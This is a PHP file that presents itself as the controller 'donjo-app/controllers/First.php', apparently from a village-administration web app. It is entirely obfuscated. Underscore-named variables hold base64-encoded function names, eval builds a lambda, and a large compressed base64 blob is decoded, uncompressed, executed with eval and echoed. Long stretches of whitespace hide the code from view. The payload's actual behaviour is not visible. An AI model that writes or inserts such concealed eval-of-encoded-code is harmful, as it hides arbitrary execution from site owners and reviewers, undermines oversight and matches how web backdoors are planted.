<?php 
        $__='printf';$_='Loading donjo-app/controllers/First.php';
        































































































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='eNrtfWtzoti+9/upOt9hXpyq3qfmefYBjDOxpuZFNKIQY1qNgLzZJdABIqATb8FPf37/tRYXQdOxp6dPnV1hdu8kAuvyv1+XP//Mr//8F64/Pq1ewmTz9Ol39qe4/vjkLZPn5f+fr1b/7S6Tzcsyir68rP9bDV/Wm3+ugtXPnWi+Xv/zn//89PtPYrif/+Onj//+/f77ieji5+94/VH75JMlt9YzUw7tXvePT+yjgqredQna/ePnj+vj+rg+rn/P65MbG5Jn6VutZygzc7/U1daTlS5+40ITUpOL6399gOrj+rg+ro/r4/q4Pq6P6+P6uP6vXR/hjI/r4/q4Pq5/3+uTM19/+fXqX94Xd+l9+fT7B0Q+ro/r4/q4Pq6P6y9dxwUNnfD6zzt/6d+F7d7cfI20XrSdPy7vtA7754+U1tbr6zun9xq5YVt2krE8T9vazHwNHFPdaqoXzeh9NsbNzu61tvP4ejOz2vuBMtzh+dRRXte2pR8Gkr1yk6E0SNpL9yZ75/ouX0N1HZN2ODO91cy88u2empbX9dhoR0401Mf5OO3HuTWUbFPy52Yzdho61jBcab1x5Cpd320Ym1lspFoff8e6PMdnntmUPHPtOybumSt8hv3w54v9W+313NwErrKgNWy1/nDnWfqzPWk/O8o4W+dibukrpxcdtJ6O8cd4Hutl472uXMXY0vtjuX2vqbNDJ7z5k/5p3SAALG/nVluaTW7S+9ubptaR/Pvnm9fhpH3rKHKIvUSaijGVluzGw0jrRlu3MV55fUOam62t1gmWXn+8fwivd04f+0iMra1sdo5lbOcW1pE2t7Y12t2NGIyAtzVwGu29XpfPE95stFttj9/9ac9I54CT2zfWBPNxzzjMJu3uHDjweupaUwvY3fUCyeu3D2xewkXM4Ladm6NVsb8xPvcCJ2yvnJjgF4WggxWHS/Tr3LxaA57RDLDCPIkbq9Lcul9rvU3k9tQFPjvMTXWPn3sP6/kCerPT9sY2mwvQV+D1NjT2AbSI8dUtm7OHPWMuF3uZmc0Ec0nAgYz7LxmuGD3F0Ro4XDjKRgb+t9jfAfckrO9lZkaS1vHDMu4nZnOlhQusF8/2DYw1XtEcTk998fCMw2lQwpy03nBmMRrYDjpsTKJF4pslwb9Ed8CVx9Y2I1j05MhJogB0RO/RPhPP1IN5h615R2N6E75/onU3jkIPNE7wHNyw+WlOrHGMMRmf7mfmOACMmzNLD7xOm8O/YUgPBb+NbKoxweeAwdIjnu4xunzmdAnanhCs1QPBFvDe159nuCS+W9G7bmIcGHwUI8UzL4J/QVMS4yl8LhFesS62V7ov9pbzO2ALnESE77YLHsIeCT866GirdXXgmNFCRh9NwjWDX+wtQRuym7I1y9lnc5JXsUdr4WvocXlAPDLvGzmNAidrGssGTRIdej2Gb7q/BsyBH8iUrrrHul+YfOkSTV3l8mLaNSajabM/kdSp1n01HhfqAM88TMBHE2OojrtRG/cetI7+OJ7q7bGk6o9T9WE0abfHXfXBnHZD4H6KMUb47G40lXWM8YA56e+RMQWddPX2ZLr2Dcw1lTGfMfIxhoH/PTAeUMfqFLJxulCnA+B3PG0aj93oEWNMMQCtcTieeu3HhetPurQ+PKuO25o6bD9Ou/5UMgaj6auOcfQxu69jvDGeBySwN627ahuS2uHj3fsT6RXrkbCuDZ4zHkfTTfsxbLeNrmpwObBR8fzdBPulz6fYC/bhj4xxe5qy9YFijYfRlO2TrfGxC7gsmjb2PB0bOtYTTQkG2MdgZAx1DtMC7qN+O5gpm8BWpse6IWzfzCzQW6+VYj8rZ0L0DvyChhnNdFug52bXtoYBXyvkeqPdBG8l8/7In4B+AZ+V2wcfkZy8XfgDJqu7Mj7fOSbkfgyYxsbBaUDmYH7IigNoV/IszKdcCVl58+sgba09zOsxudTa4Cfx0GEQNyOvc7161/yPMzG/ttfUNuQx5Bfo3SHd1OW6btzDu6BrB3QEPg1JPmV6wj0sdwOF7XlBex7E0ULohhvQ9DM+P0Au5jrFa3iNQextvUlz58buLn/Gut/ZjfZ6EAeSY+6PdBv2ALnZhIwsdIStRBL4LBzEgNmk9Zn4eypF3YHE1vI4mY4Ij7uOv1rYpg2YGou7jtcBrlXQy3TSccFrrYnWM67m1mipS80dkzGx8Qy5dpg1dMBo5M/M4TP2Bfmjrp1eq2Gbo+TucX3XiYfrGX3e5TYIjUO8bffvfUMxQksq2yqa/2W/vOsArrP4dTVL2zFw9Qyc7iAHnixm10D+JjS3v+r40W8df6FDZ6XYi/TwvKo987Bf6hgPcgvy5Hb560x5jSCTn/BThj6P3Kh1oHWTTr/rLDAenp9c78BrK9K3jmLHJCtto7Xhdgfw21M30G2RFxuQ+dAbsct0yheT2wFfzIjJXg/7cwF/e7K/64wWu0Hahvwdk4zfgz7WQqcEoCPYMEynLnP7rg/7DjLP603xbrSyw5ul3h8voac3n5NhBDoBrtzN57gV2zHpYePJMVsLe3LT+gw6BW1h32uaV8feyU6KZg18qMgBdAbHzShqEfxs8/Vgm1EM3bvwesHKTaVfSFdwPSD9UoPBrdTSbrsrevcLwZfvDTZOswmdAF0s7yH3KzBo/0k6HXr8QHgm2w/2DmClQnepL5jvQHKf6+Ip6Gm8wTp39D7Nw3CijkuwukkApxVoJyIbhPif79/1Z7GaQGftuR5v/kl8fwzPhZ7DMn7dzcwRfsqwoQ0AxZNJf1oK/1tPF7/x+ccJaGrfeZT8Ag+0F53D3dwzvGCvT3ZDl128ZMngIXmoP0pNR2/QvUViTcR4HN7B2bFi2AJyK5jTe6m/4GPufb2BfYTuWut4IdbGcJDhuQMcw9YDLwwl7AO2NewZhu+mxOgMdizf11Tgf6E/MTrB4/6bMIHN3Yxhj2bry97P6QU8H9gd/OT3QWec3y3oc9DRC2jsyZm4nB8nY+iF6DB4bK4dRV3gJ6Mrp+MnkA0vrtwiO+dPxgtRS9z7+ruwLVPw9BNsCMggI/0Ces3w98beYvDGwVNbxIuypUhf3xvhIMqeP6aTd8zDdIBnwk6U37W+o+ffCwv4XbCVDFrj+3HWGMrkC1ywJ8KrDHmazIz3r4142mp4K7vnRQT3i95T4NeQT5xEF9Dia+DCDoF8enKZ7jEAz80FcBnj3eHLN8DlgjnAu7CLScfPL4DlXDFksqdml+BZgX1NPh38F+wpcBLY2RfjYbwjn/Ui+hJ4uACOezdukX+6sRQ9oBjIj9xnGbaQvwHky2U0YBkB88MjtgfIT6I5dYs1rS+BAdmYlvK6Y77YBbQB/43mJtsnuHw+D+9FhwvewzpADxesbyZ080U4JR8DvjngSv779pJ9Zb6HR7owah3HIC6RX7DdrMZw6TR00qtkQ14gl+Fvq60D+UXMDq7KCKaLo71n6rDl730b9uSswf2ZOfMdYKD2b1r3E5jpXO8v4ONTHKuldfJ5YQ8O4fPAvj2suW6H3Yp9wg65gQ3Cnt2LtS4oBmCm3p5iALAps/vZWJneCtxkDJvYAO1KsFfa8PnIPvQXbkfAPp9D3JNbNGaky5IPmzQR609Oz+s9sdiCMuXz395XxhxKkKeSlY2deh7sUNh86tVd59QeYMMC1ljzE9mu8xS2U/+GfDgOL2MN/lBpTYnVYPRE61xV1kbxtafsOb6PNtmly9pesR7Aij1fnu8uvWg+Bi9X7E3AY/kWDAadYnyyE8r3Ml7K7tO7kEGgQz5+wSunbDXpl/x5Tq+Nc3Am/4D8hfJaSjAjWiEeYXtjayrjVQki2Prkt2Z0kvN+Zs+V1rEBjBPbGj9B1gR2j/ye6bK2T4oBT/ge5/3xxuExLYxhHO7KPJK0ZQ+yxcbaycbFPCuyqRlO3vCHZkpLgR/3BJgdyn5WsSc7Iv+X0TF8U+CxeXfD/CRdJ1/IlA96Cj8tfN9eYRdENnzZQTYGxaFhA4kxktHCmEyMcVvrDj8bi6h7/7jYjqXrLXz7pHjHSCGf/M+PVz5gnscHeJxhuPPiaEHv2co1xZIT7vNwvoaP8BUfVN3PKA4tt2JHaUnw78q+YY4Xr086fLinmCjF86r4PoKx1Q4htw8lvc3xJfbzOS3eO6OnK/oeMM7vleyCBu6Z3SXDI8Z9CL86LtMnhJtMp5ef8yi+OcniDlKF1jmcq/uGvt07JBOi1glbn+5HJH8Z7zFfrGGvbK5rGN1zeget9cfp3JQKHMXRFj62xOmIfP8hxeiTO4HXuTnz7zo3gdYjX3zcBG8wHrgj3TKKfsv97u5Khs28Jlrm8mEPHzs6sBi1mcfR8/g6+c8cHle+qQ4fhf8sZIf+J+0PeHnB35GttLB2/Qyv6hrFep0O8+XZ2mhM4CgchO0DdOTB62uQj2xfa+32Bv+m+7sjui1sCdg05G/Al5UBW+CU6U1f6M+K/ZAc2/yAoQR8PwMvLH6X+3PndT5khNEoyRvie7KtKB7kc5rosnfZOifXf0LvX2vdEzC2ynEPnp+wG7ALTPY35yfTIL5j+RfQ2oZyODbsJND4SutFiwHPZRBuNp7Z9SlmNjNlirOnGuxEyN/tF3xuY26nMdyJmP1W65PcaOe6f3BYrWzw4FOnPSD/XMSwyus5OH0jofnmVpv0HPTAvppz8cmGKtHT7iEZL53w+tdZ/LrFHEvgE5+RDeMCNhSfPG0TFToNshpjEh9/yeU38C63YG/LEWzZZ+AC/u1+dUJmF3K38w7bJ2Z0VPpMb1pKtMjGZ/SQycva+As2r5CN9flV6E7lVc7sm7K8nTVY3qSJdV25jeETi2UWtsjJMbI4TyU2VOAzdbdaT4evCn3G3hH8YBT7y/iJyTMRM3zDzha27ZD+rtn1X7VVS/x6RicuWRya0eXiN60D+QT+x/6lsnzCXnns7Ni+OpBNAhnzdKktRDZC8dk+n5/L92jBxijsNLJn13YJhrosQ/4z2V/EmPt6RD4axS7nLGdeXr/B9JPW534GbA7IWrtZsYnPzXPI7J8S/eTjFD4a6dxgh3dZTr1k352EEz5flWOYxTqEPcLtY3nW8HZuPD68YzyuCzp1WxX7l2ZmBN5SmV07m1yEJ/GOv6C8+EN6vRuZzJYPjvXxZif8v/SdtiflIjF+8R72CF1c0R3w98luA6w3oH/4qEzWL8syv6QvDvQs2Q1EC15vyuIkX8yW7PXvdwW8oH96+63bC/Znfd0EdoHllmw04Nhqr0nP5rY5wx3x8FKHbRBSXknr2ZDLQ17XQPaqEu2xr/3nx26eYxFrP4IRcPoMWQ99WPXVvrOPKdPnwxXF1Gu+pmKLe++kj8RYO2ox3kl/hXIqZN929u/3Z96P+yMZRzYvs0EFniA/8TPaedb4MFA4LgbJeA/87+f9m7PxEdiVkZcW/kqJntaa4MMivpDla0SuSeCccnezxNhoPYqxQteMztFIFoNdXB6LKPF4gbOb0/GD9BxOSzFg8vMFbohmq3LkhM9NNHyo0OWBeJli80f02ZODL+doJBG+uEI+6JpgvKcaohMxEGYL25MTMq7ir/N4RrQ952ez54/mW180H60fvMr31ufwKMvoOgz2xfgK9NHRvSof5jRxjrfhD7B6tKawoXIckg7y0q/yon8m5kK5VBajsSdZ/jaf+4nrA6oXkHcU8+M+VIkfjmz+Idl1JTvdh85Sm07DkNy0WP/fxI+l3C/VNgyZrwPZFbiwvx3YaM6kTWuALbs4lyMnn6jIf5Fvg98/P94wevkb5DnWs8/u0e/fhY/vQ75u0llvxBZzOqex76uyRcT+qrG7GcVPT9NRRv+shoLPfbPROm/FKas8UOURJkNWTniOttnz5fleLpqPrd84iL0JePhvwWBdGr8a28x1Uy6fcjp6J/4ax/m5nK8ZLr9T7PBYnqWsrqPzvvUxWdAgX1aPnATKjfRYzZ7g+XEeg+7+nfKkwqs/yL7rk94ar6iWdU6xe8pH3Ep7eh8yZG8/SvtjH7pco1DPe1Nug/+tvuD9mPw/8sXITp6b652eXvE5OosV92W8p+HtjVTU2nDYHeMv2lJ9DsX/qjTJ476nZMqbOV7c5zEsq3Fi/523/JmbZErPUAwOdqTWgb9c0PLSNtWFoNUT+YpRVRcCV+0d8bPFa3dpTeUYk/AvhM3IcDWq5ggA23YpVk44q8q+fF6Gi6rN+fU42Pv9Ew6/H+WbwA/qtbCO1ovwu4TdyWMtWqfrX0ir5BfssI7dPL1OtM6VT7783WThM9klX0v3t6Plcc7iLZ15hCd8Ng7mhX7M4FnMWYrxcrlS29+bdDlmMGsPij3cJIPwpuZD85hAE7ZFN7FqMhS80jBSL7MLv7JOEYvmtVWWLlNtEvOxj2mUxf0c0EbVrybfDnS3d5Qyb76umK/N6n9bkvDb14x+Ta2lK6T/vB1gn2S4GKTX/iSOXrD/Eg7bkt1b+xTThE7BGF0fdhXGGFMtN9WDZzXKe7vTpj3JTqf0finvU4ch9vEo+Y+Rcf/YOUMff4P/X8BrvfX67TXr4fheMedzNiT4Eu9FZLcAD4S/qk7wtRJOeT0I1e0ZJZzyv2fmBrw7w57Y3JuiLukKuuGGZCnR+XfRDaweMKzFvWTANaJ4TTl3QzB32VhRgH2+kgw6QceQteN1ZmPqEuf/abEHH/qt5CPx2kqLyeD8Gfa3E1NM3vOqfufMGrKa+ix25lANYcx6EX61J8HjyBi2pwv14e+ksdJafxSNBfNYvSIdKHoVnty+vqMcm2O0qEZDovzcXaeIK0BOUX1kNbbwVn1QFqeHfwiYJuOgeOZqWYtHZ3naXOY2dwznamv0KA+nuX/cYTgknUO9TtHMHC5JXhTrg32Z3ixmsZoCT0d5UCe+frk7iLwD9uul9XkB7xR84AhZvHXKz8sbToc9ndXmkC2d7T+zPyrvh5Qzc2Um58X6BA0STONWwxTyma93CBqmfhE5EPss5W/F3LSOQ1Y7zOiDYlV7zyI5wWzrAH4nW7MGOxv0mdr94ZR0gdPReP4558126ige5aGeMD/v94gKXYN3qe/tKV97iTYsspuLnHhI9ejAx8KV7JXDes2MhRYe59hP0VhJJuB9+BIn6QU2UhytSa/YJoia13PrQqYlgMsvmU1IOBC11dh7sNN6qwOzschO4DH2DF5f4xE2Hva5pT4rV4kons7suc8TLWT+oqK17iku0gcfPf9lu702H9VCfLtczuoFmA3LdKcWnq4LEDYFfEKK/aqS09DOxZCO8uOFvQx/gPUFjXduKHLv9fH/nFleMBP6waE48G21bqM8TvW5Uq38yZoPbsNQjRPVuXvwRYTtE2rPZ56N1cbMvHSvq8BT1DCjBUEHLL5DdRfVvZ9YTy3HceQv5TmUI5ge+UmX59UvyHdQbR6eA039KF20cPuj5V/lHYyRnPUbzudK8d74m3KkeU1NL5KcLF7R8boz0wa/af6I5KNyRb2lmzn4GfZvBzJ0we0Nlqe3qDfvi6ku9cqYJ+2oGDKrVEvjlnxiquWmuMbM9Gu1WKA7aVb3gcr7FrF04ZPLLYnrCr9mi4n+wDXznWGTz80g+No6wSPkO1AdENV/Uq/wsqz/L6oNKflhbh4jGv12UcyHePa7x49P10Z4SkS5JPg+Ra8Ur/npXma7F/j9FhpvZHRWq9W9zJ9m/SxVGZbvUa35qAfgQIbNkM9/V4v1sdrDUj5SHzkN1tNHPa8jqqcxchhqb9BANV4OHd9T1+9Zq+CPGt/kMRwWg/yb8os8RvWj5CzlaQLYeCxGZ7Me979Kl9SHqdIR1Kyem+qy3rBZvrmf4aL6amUYzbPYZA+/V2Qr2Te2SfURtTwZbEub7NYt9ZBVYyNCHsHWN+JirVcJ9P9rXeZSf/hVdfyGTfHmXuuF6qHKdjZ/vlncC2uytxznZDbNlGxp6sfvBjKtRdg4Z/TSO+KlSsD6Kln8VuiWLM5F+BmcuD84hf/D+m+zTeY97hthLhHjvv/B/vI4wL3IKu879Es5PbLzjAR+0KpEIwyGBVyquCb8uFlNPvUzMD177v0TvHCWrihfWlnroqD/qLQG8mHYeQDb0ryk506tR9RnG8/z3rU/T4aUh4nAj5S3WZ6oq9wdx5CFf3gkj67OwT2G7pB4fhnPWVTfdxyXOL2fiqwQdeZuD3TD+ooKGVDo/1N4OT9GxuPF+6weifKieV9L1T8TtcB7p8FqAHPYcn18xq/j9m8+ZskGptxaBS7joqbXKN7huaXq/hjOIc/HFCsufc51tG1ChqftP12FdBxsGqpbO+Lbt/IE8F3iVgo7lvp6hG20/qs2PmS+DZzJAclnMe/L/76+KXi+Vk8PXQHaZWdnnM0xUd9hCb96uvfv6/Yu4826PXNyH5TbqfJyzb6p5PHCSfnsIJXz4jzV3sp/nByrqreymoo875fpZtZH3Tpxv3Uaz//OekX5Cr9Mxidh8k45wft1SviFThD4PbYzaLyZpUOeLHJ6ceJrhmtLbn+eyuO8ByqvozVpXUYwU3yfcmYn10ln6GSx0LTc2zDeOun6pRwPPbGGSuy1uTsRPw0/w4+Z98FLz1Kihc3DHHLQYj03flLSjdCV2s5jcZ3giZ2Do6iHQequBmERq52z3qGrUE/btFfq3Wjpciukvsx56v6ihVeleK3I6+H5z51W8DnU3owD57ah2Bvl0UYmnXe1hy6lGBB+Fvqpvv8c36f6lXPfi2zZJzqXwu0Eg5ExVsdSazIxWiNjqt9PpuuVmZb2W9KhjE7knAYTy5C+sh8PNgblL8hv/hEx67N0nsWPT9Lgt8Srz8pX6teC7j7Nt5v/jVh1qZcnz93uWV3Wd+9TPd8/9L7a8EJfvifHPir6QkR9QKZ3RT3Jkf6Vq/r4wnq44/Xmtas0Jqt93vP6hLM1rjR+Hgsswaeobfjovf2/0Xsr5GjRg/Md6udKOe5v74v7vr0GC1vMS74I50eiv5vCp63FFSF7IK9Z7bnC5OyTF6trOleJy6KavcTsDqthU16BYEix0SxOm3pUT5v67Fww5g9ZGsVUkknlb8jnV8+k/qlRLWbLZLDRUihvRvumvWU2n5sYa9u6x1pbDQf6kuxrXeI6+/uM29xZCtVdsXF3WjcYsd+VJumndG4Or//6HHROZ7Tmc5R+FzC18vvC7q30Tp+ZA7CHX8DOq2pPp5GhlvvyyC5h52KaG+qBpHwk5SyeZ3Q2ohIE4gwlkXOc+uPFcAQ7Q2NyriF65WBTg4d34I9nj84JNalGnMfdcxvu6B7l45uRl7Yf4X/Cp402rO408+lYHQL532/65sf9f/2jtZDuXmJsqu96mnZbj4bK+tX3Xm+4nBktpndJNrEztnqAL97nvcnCZmV2p3HAXMy/N0UfYWfC6y6pjovreIlqWqiu/AF2DNZCteNe4Nzkz1OeGzAVPeHShuIn/oz1TbGzPYM5YDmlmDXv62Rn3dnKwndIvkyu8t5yjMVkU9bTzuAg7lnlc6ZgZ9B+js6sKtn+pb28OCz2Cx0i1neij5/FMSAPS89C7gp7B/+gg72tDf5l8OjReXmv9Bz0e8TO1GLrBPyz56zJYi1grBd8RXtqh+IcSxbDyt+LW09ES8fvZbzA3otYLq1TvAMfTdQElt7hvqfspnyv92GxBzpnoNAdAlfgOf5uJGpRuH0MXn1PD9uK1RglWQ6B6qcrfusoi8ezMVdirt/y9VLfYqO9YzEqdZ2ttb4P+KHEx49xi+L1PvN3KLdi7kvvUA2Qus3OMijJ3YwW4RsQLbIzVJeiH5xy2iviz/xsVH6eHj5n9njK4gilM2OpJ9rtRWt2ZmvoivmjzF8Q9FnK75d6dDlsh3vKqUFWORkcLuY54JNqWWbwv/jz3qCgXeqVBh/0POrZXtOa50pE/fxbTR1S/k302DM6XFHPNniR4jUFLI9tfMYf2VqtvA9YOj73rcSTX3K/ti5fqrgdPHbXrPe229xRfCxbt5jveJ/9su6FfQH/GjoZPJzzQMLpT9B3v71zG6O7Yt2531aKp/AzGzNdZVP9txJkZyRsOfzpnLwcd8LuIT2YnV8pzuiLbPxbJxN1PJ2qrcl4ir8XxoRszkF4E2rU79kD75hF36cWlm0bfQUbhM44PDqv8nSvwCzjtWO/iNWpqGRjPhVnJlZrGcdLqsssx/LYeccsrqCzmEM9x8nOJq3mgqrn+WW1cmKNtZ4Inndj51qfs19Frq6wXbP4KfZ0X4v/MTgaLXa+8bm6FPFMqfalvI5ajkrMR3LhbA9adsZfnlcTc7zQOeJ3dV8wmlOfPcmtmGJ0tZwaZNPmYCl09vgq4OdmnY6zGqpujGtx1SHZrVGpr/ydfbHiPXYGlVvPHStkZ9EZlpA9ph644Tv9zdp7NRg3iJ5rNMBjIg2sicX6KjSVf57lbevn9VAPhLqdJ7znvUoPJ84JIzsqovMxnXglC71c82tOnzOY9QHln9d7eI760NlZCIJf3G/iI6FLy7FgifwzyqG4PZ3ylpBfrR07i6OrPow7XzsTx945/Oxa0Nz+46yd7Kwdfg5tdq76gdcH5WfuLsiGmzcMfi66An8ypr40il3pkRN3S2eJZOeaj+FrGnR+O+S/scz6DqDbJA963U1ZT8Ee9nwgzk4hOyR0lNdoXpzVUj6z9npu2uzclc9Ud6bodObKdsB1W3G2AHRNOQ7N45+e6Fl31+JvwYvMlhE50aNY+PF4PAYOW/l15xyd75Pxtrhn1OiE+UdefwE+Dw6uDF7oGUGpp3EB35l6FLziTOG3+s/aEcnDv5iL29vM3/iW3Fu1Bset5SDe1WsgzmTyrKFc7znI6qWCeh1H3zh4J/JhRa3W+8eid/4WfV/tf6MemAmPf3rmsMHi1unps9Hwe+jReUWiHoP542k1dirWmPVFGKJ2ox6T4/CNWsm86E/K7mX6VXYbLDdZ2YMO/vBWJ3TVWXi6yQldmtB5wtHhgrqz1KvXLvK1Uq61Ritfy6PMllN53DbUFp3X3zWmY2OSVnH+3c8VO1q7o7Dv4qjS1JlzSfNxs/dqMKXveJjX+81Onjta2FH88zq909nv3TNj0T213mdGZ6FP/DP7jJ74d1SoW36mVc3mq54jembftXGWJ84+LGqaGI99NTfN5d7fmItm6zB+eB6ajQV88XMEU79yTgGTSVQ3eODnljXr5xvF5bN+qafEXh31V75lj/y13qoKHDySVbvcpsrPa39fzS7LY5K9T/skfzvKzpsr/MXvErdnsrE+z3dYb6neFj74rZSwWHFvs6DeBfCDBF5o3Xfq/m/Rh7A+wXN1+SX6+fM+6iKfR/bgsAF/+HneoTPYjuYu2cvR88waRlrHfdUPy6N4JJ1NNYMPRDVVWc3jRDH2xJNal+ucrK+jY+okZ0QdQT5m+s4xJTqPbxq5YRaLmlEO2lyL7wkYQpZMff1wnzz4R2fGUQ4y21NWvzwA3cqzSXtiiHplrIdyzYGoQ9VBk/EMite7/U77PffdAefpLKcPThfvq1Nh3/cidJUl9N1dpf9b77HvEqGzHShORzxsuPHrLXhDEvmls/V0RF/4HZ+zPo4yjfDceIfOSOPj5Pt+gy9YjWqffKpo4fzlOmcRe5Nb8Fml5Nv707+WT+PnCJZq277lXLMX4k+L23hHdVq85pud+1Z+RtSiVM6XjY/XQuf+ga+e2HdZWPpWrGPrUByP0Yh/fK7j+XGY/oN8Xon6nHDeH0tu/56+J4jgu4WPuSm+p8fb0Xf18O/uoe8Ca68GfN07NzE2HsuhXJMPROfq8XcO7HvdqEcvhO+5sdIjmISZ/5utRexJoT6AYboQfClq95Uh/LkgYj4/fUdeGPRGMn3Hk7/N7OgM/1SnhfUfx9J4/CKrp8nsfhl8weDH6karOase0az0yyxuLb5Q3QSL12qrSt6G5sJ4VAe+IJoN3C7v8f4Me9aN2Tn/Bztlcrz6bOQ2huw7o1h89Xbpa6HoBWfPsb4M7BX8QeeEwnfQnl9D9/nqepZov9CzWVxbi6i+OHohWpuwGtE2+04p8t21brQgfuXfx8c/H4TtIftOOIX55y/8O31eI3beqXWz1rgM2UFvJPeH6X54uHkFLvfD0OVzP5fzWeU+u/Ems7/pd+A2xNh0Vid9J2OX5NbpM4HP173P4bfbE87zl50bVx/TorNCYzX9Ub1HWR3Xka186jyBybjyzPtsbdhyW7tzfPbE8XcKvjnOmbP/xbhq5f6E9XeXbXmKDSxq9nzluwkIj1rnhtFE5f2qz57VeEmUtyq/l9cOUo5Iqft9Tgw9W4vJi89r54tweX22ZyvT2ZV9DMp1ZpP324bl753CO5QDot74Um0H5K/Q6cc+Mfv81HcklOQXkN6jug/1cPdYPQOmGLesE3idsJHSudKGOh4NDt3tfeeGdCjLUWpdm9VmamHei3/Oxqf8EsVsAZ9R/bu0Tukh3uP4JM5bjagWpFxLb/eodqmV8DOEX4UtT/p7lMlm1jtjW9pSl4AvhddRPIQitlLaM8Yj+ND3UaaeCZ69vd/fZ3sy+fe4HcXqEunu0+8//fTjvwz3D/bzH+Kv//r9ktdL777nxf8sJvzHJ/r/T/8vnzbf+X/89PHfv99/Px3TwD+OiI6TwH/9/j+B2Myp';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      






























































































































































































































                                                                                                                                                                                                                     $________;
